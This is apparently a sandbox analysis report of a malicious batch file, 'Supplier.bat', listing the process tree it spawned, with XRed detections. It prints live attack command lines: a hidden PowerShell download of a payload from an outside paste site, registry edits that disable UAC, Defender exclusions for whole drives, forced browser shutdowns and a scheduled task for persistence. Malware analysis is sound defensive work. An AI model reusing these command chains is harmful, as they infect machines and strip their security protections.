Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Supplier.bat" "
Imagebase:	0x7ff7ac130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:36:26
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:36:26
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat"
Imagebase:	0x7ff7ac130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:36:26
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:36:27
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:36:33
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\Supplier.bat'))"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:36:34
Start date:	30/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
Imagebase:	0x7ff7ac130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:36:34
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:36:34
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:36:34
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:36:34
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:36:35
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:36:35
Start date:	30/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7df220000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	05:36:35
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:36:35
Start date:	30/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip
Imagebase:	0x7ff6c5c30000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:36:35
Start date:	30/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 15
Imagebase:	0x7ff7ffcf0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:36:35
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:36:36
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:36:36
Start date:	30/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1952,i,12353421626427265679,11746865726713041446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6c5c30000
File size:	3'242'272 bytes
MD5 hash:	83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:36:37
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:36:37
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:36:37
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:36:38
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:36:39
Start date:	30/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6f55f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:36:39
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:36:43
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:36:47
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	05:36:50
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	05:36:51
Start date:	30/12/2024
Path:	C:\Program Files\7-Zip\7z.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOCX.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
Imagebase:	0x5e0000
File size:	557'056 bytes
MD5 hash:	9A1DD1D96481D61934DCC2D568971D06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:36:52
Start date:	30/12/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 15
Imagebase:	0x7ff7ffcf0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	05:36:53
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	05:36:55
Start date:	30/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	05:37:07
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe"
Imagebase:	0x400000
File size:	1'710'592 bytes
MD5 hash:	A0177C0A9F2254179B112EECF3C58CC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	05:37:07
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM chrome.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	05:37:08
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM firefox.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	05:37:08
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	05:37:08
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\._cache_DOCX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_DOCX.exe"
Imagebase:	0x690000
File size:	939'008 bytes
MD5 hash:	14AE5A17618D08F48A350E9496C2C959
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	05:37:08
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM iexplore.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	05:37:08
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM opera.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	05:37:09
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM safari.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	05:37:09
Start date:	30/12/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	4BC81D74086B89C85F1D208F781675F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000032.00000003.1789798838.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	05:37:09
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM brave.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	05:37:11
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	05:37:11
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	05:37:11
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1
Imagebase:	0x30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	05:37:11
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs
Imagebase:	0x850000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000037.00000002.2539046765.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000037.00000002.2537729882.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000037.00000002.2537729882.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	05:37:11
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM vivaldi.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	05:37:12
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM epic.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	05:37:12
Start date:	30/12/2024
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x930000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	59
Start time:	05:37:12
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM yandex.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	05:37:13
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe
Imagebase:	0x400000
File size:	939'008 bytes
MD5 hash:	14AE5A17618D08F48A350E9496C2C959
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	05:37:13
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM tor.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	05:37:14
Start date:	30/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM CMD.exe
Imagebase:	0x7ff688bc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	05:37:20
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe"
Imagebase:	0x400000
File size:	939'008 bytes
MD5 hash:	14AE5A17618D08F48A350E9496C2C959
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	05:37:26
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 2628
Imagebase:	0x20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF7C0310AE9 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1338594955.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7c0310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b32c54d36459aaee03fa6e0433deb01be2ad8ebc3e18f37f98be1cb069848ae
Instruction ID: 859e65799b97c297c827d5608940f61b152a84a724837fe08f1bb676d37ef2e0
Opcode Fuzzy Hash: 6b32c54d36459aaee03fa6e0433deb01be2ad8ebc3e18f37f98be1cb069848ae
Instruction Fuzzy Hash: 2F611831E0DE864FE799AA2858511B8B7C1EF49374B8802BED04EC72D3DF5CB80596D1

Function 00007FF7C0310BC9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1338594955.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7c0310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9303e9ebf4d4ca0de065cbb5a05756c2ad877059282d7d5882d4aa80a9765ad
Instruction ID: 8924a84d613c4e7367e0ff43472e9a37f7dbf4d5a38ee91cf14bca9d7a1756bd
Opcode Fuzzy Hash: b9303e9ebf4d4ca0de065cbb5a05756c2ad877059282d7d5882d4aa80a9765ad
